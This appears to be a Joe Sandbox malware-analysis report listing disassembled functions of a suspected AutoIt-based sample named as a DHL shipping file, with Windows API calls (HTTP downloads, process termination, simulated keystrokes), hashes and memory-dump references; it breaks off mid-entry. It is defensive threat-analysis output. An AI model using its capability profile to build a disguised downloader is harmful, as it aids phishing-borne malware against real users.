                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString$_wcslen
                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                            • API String ID: 4099089115-2391861430
                                                                                            • Opcode ID: 3ee46a5a80fb3e4a6a324e922bce68947035fdd022aab59684d958c3bad94579
                                                                                            • Instruction ID: 0af09cfe069d2e2c79d40a9415b25c9d4d83116fe5bc45b2ed9d7cb3681a13ad
                                                                                            • Opcode Fuzzy Hash: 3ee46a5a80fb3e4a6a324e922bce68947035fdd022aab59684d958c3bad94579
                                                                                            • Instruction Fuzzy Hash: D3516E71800219BBCF15EBA4EC56EEEBB78FF14344F184125F515B2192EB341B98DB62
                                                                                            Function 008B8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                              • Part of subcall function 0083912D: GetCursorPos.USER32(?), ref: 00839141
                                                                                              • Part of subcall function 0083912D: ScreenToClient.USER32(00000000,?), ref: 0083915E
                                                                                              • Part of subcall function 0083912D: GetAsyncKeyState.USER32(00000001), ref: 00839183
                                                                                              • Part of subcall function 0083912D: GetAsyncKeyState.USER32(00000002), ref: 0083919D
                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 008B8B6B
                                                                                            • ImageList_EndDrag.COMCTL32 ref: 008B8B71
                                                                                            • ReleaseCapture.USER32 ref: 008B8B77
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 008B8C12
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008B8C25
                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 008B8CFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                            • API String ID: 1924731296-2107944366
                                                                                            • Opcode ID: 83fc71c9605e44eb074bbdc43b93b94133c64268e28e5c67e7685f0b016699c6
                                                                                            • Instruction ID: cea7905f47565af1bf3bb38af934546835d8e6a2f4f1605b4e78a61dbb2c5db8
                                                                                            • Opcode Fuzzy Hash: 83fc71c9605e44eb074bbdc43b93b94133c64268e28e5c67e7685f0b016699c6
                                                                                            • Instruction Fuzzy Hash: 1E517F71204314AFD704DF24DC6AFAA7BE4FB88714F40062DF996972E1DB71A944CBA2
                                                                                            Function 0089C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0089C272
                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0089C29A
                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0089C2CA
                                                                                            • GetLastError.KERNEL32 ref: 0089C322
                                                                                            • SetEvent.KERNEL32(?), ref: 0089C336
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0089C341
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                            • String ID:
                                                                                            • API String ID: 3113390036-3916222277
                                                                                            • Opcode ID: 437eba82058aa035e6bfd271c601abc2f9a400665adb954575c43ab39e06b5ba
                                                                                            • Instruction ID: 89e54ea509f86908362b55809aea415706d1f14c7afd1d476531c800645e7fcc
                                                                                            • Opcode Fuzzy Hash: 437eba82058aa035e6bfd271c601abc2f9a400665adb954575c43ab39e06b5ba
                                                                                            • Instruction Fuzzy Hash: FE3150B1600608AFDB21AFA9CC88AAB7BFCFB49744F18851DF446D2201DB76DD049B65
                                                                                            Function 0088989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00863AAF,?,?,Bad directive syntax error,008BCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008898BC
                                                                                            • LoadStringW.USER32(00000000,?,00863AAF,?), ref: 008898C3
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00889987
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                            • API String ID: 858772685-4153970271
                                                                                            • Opcode ID: 04275180b277853f4684cdcf086fa8c423ec0dfd74a76ed640d975ff4415c456
                                                                                            • Instruction ID: 4644bc344b95123e1bc8bc537a46e1a8804c0c76625fbadd0740236b33666db2
                                                                                            • Opcode Fuzzy Hash: 04275180b277853f4684cdcf086fa8c423ec0dfd74a76ed640d975ff4415c456
                                                                                            • Instruction Fuzzy Hash: 4E217131C0021EABCF11EF94DC1AEEE7735FF28304F084465F515A11A2EB759668DB51
                                                                                            Function 0088209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetParent.USER32 ref: 008820AB
                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 008820C0
                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0088214D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameParentSend
                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                            • API String ID: 1290815626-3381328864
                                                                                            • Opcode ID: b1fdee6edc94dd6db365a18e57936d5b476ee107c3b95d51f1d710ef09cb539a
                                                                                            • Instruction ID: 4ee54d269e40ffa024e5d53ae7aebfb645f71114dd20ab85c3131fa191fa0fd4
                                                                                            • Opcode Fuzzy Hash: b1fdee6edc94dd6db365a18e57936d5b476ee107c3b95d51f1d710ef09cb539a
                                                                                            • Instruction Fuzzy Hash: 0B11067A6C871ABAF6017225DC0ADAA379CFB16728B30111AFB04E51D2FFA578015715
                                                                                            Function 00858D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eef4e3a1bdf094090785d530d49083a89059dcb25d836d53b6c991692f6cf8ce
                                                                                            • Instruction ID: 776a72030e09a89c87e5e0c5806f366296d90cbbcde5a4bff66537f8dd558344
                                                                                            • Opcode Fuzzy Hash: eef4e3a1bdf094090785d530d49083a89059dcb25d836d53b6c991692f6cf8ce
                                                                                            • Instruction Fuzzy Hash: 2FC1DC74A04249EFCF119FA8C845BADBBB4FF09312F08419AE955E73D2CB709949CB61
                                                                                            Function 0085CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                            • String ID:
                                                                                            • API String ID: 1282221369-0
                                                                                            • Opcode ID: 60b12d9a356183070df2d03d1211e6e14041be28053bd37b942b3905b101aea7
                                                                                            • Instruction ID: 165a1e7f1143eb2ab4162758e3b5c6a5fc1e0f0fa182b8ad192cfa09ae53a4d9
                                                                                            • Opcode Fuzzy Hash: 60b12d9a356183070df2d03d1211e6e14041be28053bd37b942b3905b101aea7
                                                                                            • Instruction Fuzzy Hash: 4B611371904314AFDF21AFB8D881A6E7BA5FF06362F14426DFD40E7282DA719D09CB91
                                                                                            Function 00838B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00876890
                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008768A9
                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008768B9
                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008768D1
                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008768F2
                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00838874,00000000,00000000,00000000,000000FF,00000000), ref: 00876901
                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0087691E
                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00838874,00000000,00000000,00000000,000000FF,00000000), ref: 0087692D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 1268354404-0
                                                                                            • Opcode ID: 193eca67935a8b69f70a0747b40042fb88d9c467873645d72c1764d40fe6b45b
                                                                                            • Instruction ID: ed03dcfcf12da8492f771065f8ba2f13b01889f77b98cf08d6de5caf91ec39ce
                                                                                            • Opcode Fuzzy Hash: 193eca67935a8b69f70a0747b40042fb88d9c467873645d72c1764d40fe6b45b
                                                                                            • Instruction Fuzzy Hash: 5E515A7060070AEFDB20CF24CC55FAABBA5FB98760F104528F956D62A0EB70E950DB90
                                                                                            Function 0089C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0089C182
                                                                                            • GetLastError.KERNEL32 ref: 0089C195
                                                                                            • SetEvent.KERNEL32(?), ref: 0089C1A9
                                                                                              • Part of subcall function 0089C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0089C272
                                                                                              • Part of subcall function 0089C253: GetLastError.KERNEL32 ref: 0089C322
                                                                                              • Part of subcall function 0089C253: SetEvent.KERNEL32(?), ref: 0089C336
                                                                                              • Part of subcall function 0089C253: InternetCloseHandle.WININET(00000000), ref: 0089C341
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                            • String ID:
                                                                                            • API String ID: 337547030-0
                                                                                            • Opcode ID: f4b9727a19814b60f4552d4e6f7fb51626455c398e5f084903c493b306ecb8a5
                                                                                            • Instruction ID: de5cce2f238491a67df9d323f7320bf0e4c9d24c169d6d9628590a529e1d5e32
                                                                                            • Opcode Fuzzy Hash: f4b9727a19814b60f4552d4e6f7fb51626455c398e5f084903c493b306ecb8a5
                                                                                            • Instruction Fuzzy Hash: 28316A71600605AFDF21AFE9DC44A66BBF9FF58300B18452DF956C6610DB32E8149BA0
                                                                                            Function 008825A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00883A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00883A57
                                                                                              • Part of subcall function 00883A3D: GetCurrentThreadId.KERNEL32 ref: 00883A5E
                                                                                              • Part of subcall function 00883A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008825B3), ref: 00883A65
                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 008825BD
                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008825DB
                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008825DF
                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 008825E9
                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00882601
                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00882605
                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0088260F
                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00882623
                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00882627
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2014098862-0
                                                                                            • Opcode ID: 32330a04de0a82f4be395286297a9213e4e15115c8304a829d84876cc35a41e0
                                                                                            • Instruction ID: 0a41275322fe59fdcce52572f0d078e2646117341cb4c567ddcc80125dcbec5e
                                                                                            • Opcode Fuzzy Hash: 32330a04de0a82f4be395286297a9213e4e15115c8304a829d84876cc35a41e0
                                                                                            • Instruction Fuzzy Hash: E801B170290624BBFB1067689C8AF593F59EB5EB12F100106F358EE0D1C9E224448A6A
                                                                                            Function 00881803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00881449,?,?,00000000), ref: 0088180C
                                                                                            • HeapAlloc.KERNEL32(00000000,?,00881449,?,?,00000000), ref: 00881813
                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00881449,?,?,00000000), ref: 00881828
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00881449,?,?,00000000), ref: 00881830
                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00881449,?,?,00000000), ref: 00881833
                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00881449,?,?,00000000), ref: 00881843
                                                                                            • GetCurrentProcess.KERNEL32(00881449,00000000,?,00881449,?,?,00000000), ref: 0088184B
                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00881449,?,?,00000000), ref: 0088184E
                                                                                            • CreateThread.KERNEL32(00000000,00000000,00881874,00000000,00000000,00000000), ref: 00881868
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 1957940570-0
                                                                                            • Opcode ID: 057d1b65812cd165a7b23f59c3435481dbc956c4e42663a44e11c792847b64c1
                                                                                            • Instruction ID: 94dfd0748f12548d0593dcbc126ad9e55d041cad46c2352a116075fd6ac7a052
                                                                                            • Opcode Fuzzy Hash: 057d1b65812cd165a7b23f59c3435481dbc956c4e42663a44e11c792847b64c1
                                                                                            • Instruction Fuzzy Hash: 4A016FB5640344BFE710AFA5DC4DF577BACFB89B11F414521FA05EB291DA759800CB60
                                                                                            Function 008AA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0088D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0088D501
                                                                                              • Part of subcall function 0088D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0088D50F
                                                                                              • Part of subcall function 0088D4DC: CloseHandle.KERNEL32(00000000), ref: 0088D5DC
                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008AA16D
                                                                                            • GetLastError.KERNEL32 ref: 008AA180
                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008AA1B3
                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 008AA268
                                                                                            • GetLastError.KERNEL32(00000000), ref: 008AA273
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AA2C4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                            • String ID: SeDebugPrivilege
                                                                                            • API String ID: 2533919879-2896544425
                                                                                            • Opcode ID: dbad7f9b49f80872ba16490a800ac0061e054c56467591f943df6a700c866c4c
                                                                                            • Instruction ID: 11f830b0fe61f371a2afbbf36ee1140e95b13b0e06e67c22260ea86e623e07c1
                                                                                            • Opcode Fuzzy Hash: dbad7f9b49f80872ba16490a800ac0061e054c56467591f943df6a700c866c4c
                                                                                            • Instruction Fuzzy Hash: 12616E30204242AFE714DF18C494F2ABBE5FF45318F14849CE4668BBA2C776EC85CB92
                                                                                            Function 008B3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008B3925
                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 008B393A
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008B3954
                                                                                            • _wcslen.LIBCMT ref: 008B3999
                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 008B39C6
                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008B39F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                            • String ID: SysListView32
                                                                                            • API String ID: 2147712094-78025650
                                                                                            • Opcode ID: 44eec8023455b662ad9956eaee52cec2862d83a15d1af05005e69f8d809ecd08
                                                                                            • Instruction ID: a69b4594eb7fbbf172e2897dad2ad8cc748212ffc671da8150cee0626743ca0a
                                                                                            • Opcode Fuzzy Hash: 44eec8023455b662ad9956eaee52cec2862d83a15d1af05005e69f8d809ecd08
                                                                                            • Instruction Fuzzy Hash: AC41B471A00218ABEF219F64CC49FEA7BA9FF19354F10052AF958E7391D7B19D80CB90
                                                                                            Function 0088BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0088BCFD
                                                                                            • IsMenu.USER32(00000000), ref: 0088BD1D
                                                                                            • CreatePopupMenu.USER32 ref: 0088BD53
                                                                                            • GetMenuItemCount.USER32(00B38200), ref: 0088BDA4
                                                                                            • InsertMenuItemW.USER32(00B38200,?,00000001,00000030), ref: 0088BDCC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                            • String ID: 0$2
                                                                                            • API String ID: 93392585-3793063076
                                                                                            • Opcode ID: 2bce46c12a522bde595f1fa0005999fe387560c36fea9ae3261394ae87880302
